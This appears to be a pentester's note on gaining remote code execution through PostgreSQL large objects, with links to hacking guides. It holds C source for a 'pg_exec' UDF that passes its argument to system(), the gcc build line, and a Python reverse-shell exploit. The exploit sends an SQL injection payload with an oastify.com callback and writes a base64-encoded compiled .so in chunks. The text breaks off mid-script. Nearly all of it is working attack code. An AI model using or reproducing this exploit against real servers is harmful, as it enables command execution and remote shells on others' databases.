--- # System prepended metadata title: PostgreSQL Large Objects tags: [BlueCyber] --- # PostgreSQL Large Objects ## RCE Postgre - https://hackviser.com/tactics/pentesting/services/postgresql ## PostgreSQL Large Objects - https://hacktricks.wiki/en/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.html ### RCE in Linux - https://huntr.com/bounties/faac0c92-8d4b-4901-a933-662b661a3f99 - https://hackmd.io/@LwUkTWwBSVKVI1AAsOQuDg/SJGfuFjpkl - https://hacktricks.wiki/en/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.html - https://www.ucolick.org/~de/PG/Man/large_objects.3.html - https://knowledge.dhound.io/security-practices/exploitation/rce-with-postgresql-extensions - https://www.tigerdata.com/learn/handling-large-objects-in-postgres - https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md - file so ``` gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c ``` ``` #include #include "postgres.h" #include "fmgr.h" #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif PG_FUNCTION_INFO_V1(pg_exec); Datum pg_exec(PG_FUNCTION_ARGS) { char* command = PG_GETARG_CSTRING(0); PG_RETURN_INT32(system(command)); } ``` RCE ```python= # !/usr/bin/python3 import random import sys import requests def reverse_shell_via_large_object(base_url: str, listener_host: str, listener_port: str, session_id: str): loid = random.randint(10, 100000) extension_name = "/tmp/pg_exec_{}.so".format(loid) payload = """e11', 1000, 0, 'no', 0, 'fake injected content', 'fake injected content', '123
More information: http://mvlcw0p4vg6j4e2q50ayzit5yw4nsfg4.oastify.com
', 'oldie', 'blah@gmail.com', 'y', '20221102152119', '', 0, '00000000000000', '99991231235959', '2022-11-02 15:21:20', '');""" payload += "select lo_create({});".format(loid) # UDF Extension compiled for Debian buster running PostgreSQL 11.17 chunk_1 = "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" chunk_2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" chunk_3 = "SIPsCEiLBd0vAABIhcB0Av/QSIPECMMAAAAAAAAAAAD/NeIvAAD/JeQvAAAPH0AA/yXiLwAAaAAAAADp4P////8lsi8AAGaQAAAAAAAAAABIjT3RLwAASI0Fyi8AAEg5+HQVSIsFdi8AAEiFwHQJ/+APH4AAAAAAww8fgAAAAABIjT2hLwAASI01mi8AAEgp/kjB/gNIifBIweg/SAHGSNH+dBRIiwVFLwAASIXAdAj/4GYPH0QAAMMPH4AAAAAAgD1hLwAAAHUvVUiDPSYvAAAASInldAxIiz1CLwAA6F3////oaP///8YFOS8AAAFdww8fgAAAAADDDx+AAAAAAOl7////VUiJ5UiNBfAOAABdw1VIieVIjQX/DgAAXcNVSInlSIPsIEiJfehIi0XoSItAIEiJRfhIi0X4SInH6O3+//9ImMnDAEiD7AhIg8QIwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" chunk_4 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" chunk_5 = "HAAAAEwEAABkAAAAIAAAAEAAAAABAAAAAQAAAAEAAAABGwM7NAAAAAUAAAAA8P//UAAAACDw//94AAAA5fD//5AAAADy8P//sAAAAP/w///QAAAAAAAAABQAAAAAAAAAAXpSAAF4EAEbDAcIkAEAACQAAAAcAAAAqO///yAAAAAADhBGDhhKDwt3CIAAPxo7KjMkIgAAAAAUAAAARAAAAKDv//8IAAAAAAAAAAAAAAAcAAAAXAAAAE3w//8NAAAAAEEOEIYCQw0GSAwHCAAAABwAAAB8AAAAOvD//w0AAAAAQQ4QhgJDDQZIDAcIAAAAHAAAAJwAAAAn8P//KAAAAABBDhCGAkMNBmMMBwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" chunk_6 = 